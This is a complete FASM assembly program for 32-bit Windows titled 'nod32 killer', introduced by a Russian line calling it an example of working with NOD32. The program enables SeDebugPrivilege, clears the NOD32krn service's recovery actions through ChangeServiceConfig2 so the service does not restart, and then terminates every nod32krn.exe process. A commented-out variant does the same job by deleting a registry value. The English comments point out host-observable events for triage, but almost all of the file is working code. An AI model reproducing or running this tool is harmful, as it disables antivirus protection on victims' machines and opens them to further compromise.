
Пример работы с Нодом:
; --------------------------------------------------------------------------------------
; nod32 killer
; Created by Ct757
; --------------------------------------------------------------------------------------
; Assembler: FASM (flat assembler); 32-bit Windows PE; Win32 stdcall calls are made
; through the `invoke` macro from win32a.inc.
; The program does three things, in this order: enables SeDebugPrivilege on its own
; token, clears the SCM recovery ("failure") actions of the NOD32krn service, then
; terminates every process named nod32krn.exe.  For triage purposes each step is a
; distinct Win32 call and a distinct host-observable event (token adjustment, service
; configuration change, cross-process termination of a security product).

format PE GUI 4.0
entry start

  include '%fasminc%\win32a.inc'

; One section for code AND data, mapped readable+writeable+executable.  No separate
; .data/.rdata — an RWX single-section layout is itself a common static indicator.
section '.main' code readable writeable executable

	 SC_MANAGER_ALL_ACCESS		      = 0x000F003F   ; full SCM access (normally needs an elevated token)
	 SERVICE_ALL_ACCESS		      = 0x000F01FF   ; full service access, required for ChangeServiceConfig2

	 SERVICE_CONFIG_FAILURE_ACTIONS       = 2	     ; dwInfoLevel for ChangeServiceConfig2
	 SERVICE_CONTROL_STATUS_REASON_INFO   = 1	     ; defined but not referenced below

; Registry variant (see the commented-out block in the code): service key + value name.
;         szNODService           db 'SYSTEM\CurrentControlSet\Services\NOD32krn',0
;         szFailureActions       db 'FailureActions',0

	 szNODExeFile		db 'nod32krn.exe',0	; image name matched case-insensitively via lstrcmpi
	 szSeDebugPrivilege	db 'SeDebugPrivilege',0 ; privilege name resolved by LookupPrivilegeValue

	 szNODSvcName		db 'NOD32krn',0		; service name passed to OpenService

;         hKey                   dd ?		; only used by the registry variant

	 hSCM			dd ?			; handle from OpenSCManager
	 hSvc			dd ?			; handle from OpenService

	 hSnap			dd ?			; Toolhelp snapshot handle
	 hToken 		dd ?			; current-process token (OpenProcessToken)
	 ReturnLength		dd ?			; out-param of AdjustTokenPrivileges; never read

  align 0x10

	 tkp:					   ; struct TOKEN_PRIVILEGES
	   .PrivilegeCount	dd ?			   ; set to 1 at run time
	   .LowPart		dd ?			   ; Privileges[0].Luid.LowPart  (copied from PrivLUID)
	   .HighPart		dd ?			   ; Privileges[0].Luid.HighPart (copied from PrivLUID)
	   .Attributes		dd ?			   ; Privileges[0].Attributes   (SE_PRIVILEGE_ENABLED)
						   ; total 16 bytes = the 0x10 passed as BufferLength below

	 PrivLUID:				   ; struct LUID, filled by LookupPrivilegeValue
	   .LowPart		dd ?
	   .HighPart		dd ?

	 sfa:					   ; struct SERVICE_FAILURE_ACTIONS
	   .dwResetPeriod	dd -1			   ; 0xFFFFFFFF = INFINITE: failure count never resets
	   .lpRebootMsg 	dd 0			   ; no reboot message
	   .lpCommand		dd 0			   ; no recovery command
	   .cActions		dd 3			   ; three SC_ACTION entries follow
	   .lpsaActions 	dd act

	 act			db (2*4*3) dup (0) ; array of 3 SC_ACTION structs {Type, Delay};
						   ; all zero => every slot is SC_ACTION_NONE, i.e. the SCM
						   ; will not restart the service after it dies


	 p_ent: 				   ; struct PROCESSENTRY32 (ANSI)
	   .dwSize		dd p_ent_size		   ; must hold sizeof(PROCESSENTRY32) before Process32First
	   .cntUsage		dd ?
	   .th32ProcessID	dd ?			   ; PID handed to OpenProcess
	   .th32DefaultHeapID	dd ?
	   .th32ModuleID	dd ?
	   .cntThreads		dd ?
	   .th32ParentProcessID dd ?
	   .pcPriClassBase	dd ?
	   .dwFlags		dd ?
	   .szExeFile		db 260 dup(?)		   ; MAX_PATH; compared against szNODExeFile
	 p_ent_size = $ - p_ent

  start:

; --------------------------------------------------------------------------------------
; Step 1 — enable SeDebugPrivilege on the current process token.
; -1 is the GetCurrentProcess() pseudo-handle; 0x0028 = TOKEN_ADJUST_PRIVILEGES (0x20)
; | TOKEN_QUERY (0x08).  The OpenProcessToken result is not checked; only the
; LookupPrivilegeValue result is.  Enabling SeDebugPrivilege is the usual precursor
; to opening another user's / a service's process, and token-right adjustments of
; this kind are auditable on the host.

	 invoke    OpenProcessToken,-1,0x0028,hToken

	 invoke    LookupPrivilegeValue,0,szSeDebugPrivilege,PrivLUID	; PrivLUID <- LUID of the privilege
	 test	   eax,eax
	 je	   close_token			; lookup failed -> skip the adjustment, keep going

	 push	   [PrivLUID.LowPart]		; tkp.Privileges[0].Luid = PrivLUID (memory-to-memory via push/pop)
	 pop	   [tkp.LowPart]
	 push	   [PrivLUID.HighPart]
	 pop	   [tkp.HighPart]
	 mov	   [tkp.Attributes],2	    ; SE_PRIVILEGE_ENABLED
	 mov	   [tkp.PrivilegeCount],1

	 ; NewState = tkp, BufferLength = 0x10 (sizeof tkp), PreviousState is written back
	 ; over tkp itself, ReturnLength receives the size needed.  Neither the return
	 ; value nor GetLastError is inspected, so a token that cannot hold the privilege
	 ; goes unnoticed here and the later OpenProcess simply fails instead.
	 invoke    AdjustTokenPrivileges,[hToken],FALSE,tkp,0x10,tkp,ReturnLength

  close_token:
	 invoke    CloseHandle,[hToken]

; --------------------------------------------------------------------------------------

; --------------------------------------------------------------------------------------
; Step 2 — disable the service's SCM recovery actions.
; sfa points at three zeroed SC_ACTION entries (SC_ACTION_NONE), so after this call the
; service control manager takes no action when NOD32krn stops unexpectedly — which is
; what keeps the kill in step 3 from being undone by an automatic restart.  A change to
; a service's failure actions is a configuration event a defender can monitor for.

	 invoke    OpenSCManager,0,0,SC_MANAGER_ALL_ACCESS	; local machine, active database
	 test	   eax,eax
	 je	   exit				; no SCM handle (typically not elevated) -> abort everything, step 3 included

	 mov	   [hSCM],eax

	 invoke    OpenService,eax,szNODSvcName,SERVICE_ALL_ACCESS
	 test	   eax,eax
	 je	   close_scm			; service absent or access denied -> skip reconfiguration

	 mov	   [hSvc],eax

	 invoke    ChangeServiceConfig2,eax,SERVICE_CONFIG_FAILURE_ACTIONS,sfa	; result not checked

	 invoke    CloseServiceHandle,[hSvc]

  close_scm:
	 invoke    CloseServiceHandle,[hSCM]

; --------------------------------------------------------------------------------------

; --------------------------------------------------------------------------------------
; Variant (disabled): turn recovery off directly through the registry by deleting the
; FailureActions value under the service key, instead of going through the SCM API.
; The strings and hKey it uses are likewise commented out in the data area above.
;
;         invoke    RegOpenKeyEx,HKEY_LOCAL_MACHINE,szNODService,0,KEY_SET_VALUE,hKey
;         test      eax,eax
;         jne       exit
;
;         invoke    RegDeleteValue,[hKey],szFailureActions
;
;         invoke    RegCloseKey,[hKey]
;
; --------------------------------------------------------------------------------------

; --------------------------------------------------------------------------------------
; Step 3 — walk a Toolhelp process snapshot and terminate every nod32krn.exe.
; Cross-process PROCESS_TERMINATE against a security product's process is the
; behaviour most worth alerting on in this sample.

  find_nod32_pid:
	 invoke    CreateToolhelp32Snapshot,2,0	; 2 = TH32CS_SNAPPROCESS (all processes)
	 inc	   eax				; INVALID_HANDLE_VALUE (-1) becomes 0 -> ZF set
	 je	   exit
	 dec	   eax				; restore the real handle value

	 mov	   [hSnap],eax

	 invoke    Process32First,eax,p_ent	; p_ent.dwSize was set statically in the data area
	 test	   eax,eax
	 je	   close_snap

  check_process:
	 invoke    lstrcmpi,p_ent.szExeFile,szNODExeFile	; 0 => names equal (case-insensitive)
	 test	   eax,eax
	 jne	   next_process

	 invoke    OpenProcess,PROCESS_TERMINATE,FALSE,[p_ent.th32ProcessID]
	 test	   eax,eax
	 je	   next_process			; OpenProcess failed (e.g. access denied) -> skip this entry
	 xchg	   eax,ebx			; park the handle in ebx; stdcall callees preserve ebx across invoke

	 invoke    TerminateProcess,ebx,0	; exit code 0; return value not checked

	 invoke    CloseHandle,ebx

  next_process:
	 invoke    Process32Next,[hSnap],p_ent
	 test	   eax,eax
	 jne	   check_process		; loop until the snapshot is exhausted

  close_snap:
	 invoke    CloseHandle,[hSnap]

; --------------------------------------------------------------------------------------

  exit:
	 invoke    ExitProcess,0		; single exit point for every early-out above

; Import table.  Only kernel32 (process/handle/Toolhelp APIs) and advapi32 (token,
; privilege and service-control APIs) are actually referenced above; user32 is linked
; but no user32 function is called in this listing.
section '.idata' import data readable writeable

  library kernel32, 'KERNEL32.DLL',\
	  user32, 'USER32.DLL',\
	  advapi32, 'ADVAPI32.DLL'

  include '%fasminc%\APIA\kernel32.inc'
  include '%fasminc%\APIA\user32.inc'
  include '%fasminc%\APIA\advapi32.inc'